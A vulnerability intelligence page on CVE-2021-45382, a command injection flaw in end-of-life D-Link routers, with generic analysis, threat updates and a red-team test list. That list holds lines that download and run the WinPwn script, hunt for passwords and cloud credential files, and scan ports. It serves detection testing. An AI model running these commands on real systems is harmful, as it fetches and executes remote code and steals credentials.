CVE-2021-45382
Overview
This vulnerability is a command injection flaw rooted in improper input validation within the DDNS function of the ncc2 binary on multiple D-Link router models. The ncc2 component fails to sanitize user-supplied input, allowing crafted parameters to be executed as system commands. The affected feature is the Dynamic DNS update mechanism embedded in the router firmware across all hardware revisions of specified models.
Vulnerability Description
A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file. Note: DIR-810L, DIR-820L, DIR-830L, DIR-826L, DIR-836L, all hardware revisions, have reached their End of Life ("EOL") /End of Service Life ("EOS") Life-Cycle and as such this issue will not be patched.
Impact
An attacker with network access to the vulnerable routers can execute arbitrary system commands remotely without any authentication or user interaction. This enables full compromise of the device, including control over network traffic, interception of data, and potential pivoting to internal networks. The vulnerability effectively grants attacker-level privileges, allowing disruption of network services, data exfiltration, and persistent unauthorized access within affected environments.
Solution
D-Link has declared all affected models (DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, DIR-836L) as End of Life/End of Service Life and will not provide patches for this issue. The vendor advisory SAP10264 details this status and recommends device replacement as the primary mitigation. For additional information and official guidance, consult the advisory at https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10264.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical Remote Command Execution (RCE) vulnerability has been identified in several D-Link router models, including the DIR-810L, DIR-820L, DIR-826L, DIR-830L, and DIR-836L. This flaw resides within the Dynamic Domain Name System (DDNS) functionality of the ncc2 binary file. The nature of this vulnerability allows an attacker to execute arbitrary commands on the affected devices remotely, which poses a significant threat to the integrity and confidentiality of the network. The affected routers have reached their End of Life (EOL) status, meaning that no patches or updates will be provided to mitigate this vulnerability, leaving users exposed to potential exploitation.
Attack vectors for this vulnerability are particularly concerning due to the ease with which it can be exploited. An attacker can leverage the DDNS function to send specially crafted requests to the router, which can trigger the execution of arbitrary commands. This can be accomplished without authentication, making it accessible to any individual with knowledge of the vulnerability. Scenarios may include an attacker gaining unauthorized access to the router's administrative interface, allowing them to manipulate network settings, intercept traffic, or even deploy malware within the network. The potential for lateral movement within the network further amplifies the risk, as compromised routers can serve as entry points for further attacks on connected devices.
The real-world impact of this vulnerability is profound, particularly for small businesses and home users who may rely on these routers for their internet connectivity. Exploitation can lead to unauthorized access to sensitive information, including personal data, financial records, and proprietary business information. The business risks associated with such breaches include reputational damage, financial loss, and potential legal ramifications due to non-compliance with data protection regulations. Furthermore, the compromised devices can be utilized in larger-scale attacks, such as Distributed Denial of Service (DDoS) attacks, thereby affecting not just the immediate victims but also the broader internet community.
Detection of this vulnerability can be challenging, especially for users who may not have the technical expertise to monitor their network traffic for signs of exploitation. However, network administrators can implement intrusion detection systems (IDS) that monitor for unusual patterns of behavior indicative of exploitation attempts. Regular audits of network devices and their configurations can also help identify potential vulnerabilities. Given that the affected routers will not receive patches, the best mitigation strategy is to replace them with newer models that receive regular updates and support. Additionally, users should consider disabling any unnecessary features, such as DDNS, to reduce the attack surface.
In conclusion, the RCE vulnerability in the D-Link routers represents a significant threat to users who have not transitioned to more secure devices. The ease of exploitation, coupled with the potential for severe impacts on both individuals and businesses, underscores the importance of proactive cybersecurity measures. Users should prioritize upgrading their hardware and implementing robust network security practices to safeguard against such vulnerabilities, especially in an era where cyber threats are increasingly sophisticated and prevalent.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the CVE-2021-45382 vulnerability in D-Link routers, as evidenced by a recent increase in telemetry alerts. Although no new exploit variants or ransomware affiliations have emerged, the slight uptick in the EPSS score reinforces the growing likelihood of active exploitation in the wild. This trend is particularly concerning given the affected devices’ end-of-life status, which precludes official patches and leaves a persistent attack surface. For defenders, this shift underscores the urgency of monitoring network traffic for anomalous DDNS-related activity and reinforces the criticality of mitigating exposure on legacy infrastructure. The evolving threat landscape elevates the risk profile of this vulnerability from a latent concern to a more immediate operational threat, necessitating heightened vigilance despite the absence of novel exploit techniques.
Update 2 — June 07, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2021-45382, with telemetry indicating a doubling in observed exploitation attempts targeting the vulnerable DDNS function across multiple D-Link router models. This surge, occurring despite the absence of new exploit variants or ransomware affiliations, signals increased adversary interest in leveraging this critical remote code execution flaw on devices that remain unpatched due to their end-of-life status. The persistence of these legacy routers in operational environments amplifies the risk of successful compromise, as attackers capitalize on the unmitigated attack surface. Consequently, the threat level associated with this vulnerability has shifted from a latent concern to a more active and immediate threat, underscoring the necessity for defenders to intensify monitoring efforts around DDNS-related network behaviors and anomalous command execution patterns.
Update 3 — June 16, 2026
CSURFACE threat intelligence has detected a slight increase in activity linked to CVE-2021-45382, reflected by a modest rise in telemetry signals and a corresponding uptick in the EPSS score. While no new exploit variants or proof-of-concept codes have surfaced, this incremental growth in detection frequency suggests continued adversary interest in targeting legacy D-Link routers that remain unpatched due to their end-of-life status. The elevated EPSS score indicates a marginally higher probability of exploitation attempts in the near term. For defenders, this subtle yet persistent trend underscores the importance of maintaining vigilant monitoring of DDNS-related network behaviors and command execution anomalies on affected devices. Although the threat has not escalated dramatically, the ongoing exploitation potential reinforces the vulnerability’s critical risk posture, particularly in environments where outdated hardware persists.
Update 4 — July 06, 2026
CSURFACE threat intelligence has detected a marked escalation in activity exploiting CVE-2021-45382, with telemetry indicating a doubling in detection frequency related to attempts targeting the vulnerable DDNS function on legacy D-Link routers. Although no new exploit variants or ransomware affiliations have emerged, this surge reflects increased adversary interest in leveraging unpatched devices that remain operational in the wild. The persistence of these devices, combined with their end-of-life status precluding vendor patches, sustains a critical attack surface that adversaries continue to probe aggressively. This heightened activity elevates the threat environment by increasing the likelihood of successful remote command execution attempts, underscoring the necessity for defenders to intensify monitoring of anomalous DDNS traffic and command execution patterns. While the overall exploit sophistication has not advanced, the volume and frequency of exploitation attempts have risen sufficiently to warrant an upward adjustment in the threat level, reinforcing the vulnerability’s critical status in operational risk assessments.
Update 5 — July 15, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting the CVE-2021-45382 vulnerability, reflecting a sustained adversary interest in leveraging this critical remote command execution flaw. Although no new exploit variants or ransomware affiliations have emerged, the persistence and modest growth in detection frequency underscore that threat actors continue to probe these D-Link router models aggressively despite their end-of-life status. This ongoing activity elevates the operational risk by maintaining pressure on network defenders to remain vigilant for anomalous DDNS-related behaviors indicative of compromise. Consequently, the threat level associated with this vulnerability remains critical, with the incremental rise in exploitation attempts reinforcing its prioritization in defensive postures and risk management frameworks.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dir-820l Firmware | N/A |
cpe:2.3:o:dlink:dir-820l_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dir-820lw Firmware | N/A |
cpe:2.3:o:dlink:dir-820lw_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dir-826l Firmware | N/A |
cpe:2.3:o:dlink:dir-826l_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dir-830l Firmware | N/A |
cpe:2.3:o:dlink:dir-830l_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dir-836l Firmware | N/A |
cpe:2.3:o:dlink:dir-836l_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dir-810l Firmware | N/A |
cpe:2.3:o:dlink:dir-810l_firmware:-:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
26 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
44%
|
High | High | |
| CAPEC-6 | Argument Injection |
43%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-45382 |
| supportannouncement.us.dlink.com |
GitHub CVE
x_refsource_MISC
|
https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10264 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/doudoudedi/D-LINK_Command_Injection1/blob/main/D-LINK_Command_injection.md |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-45382 |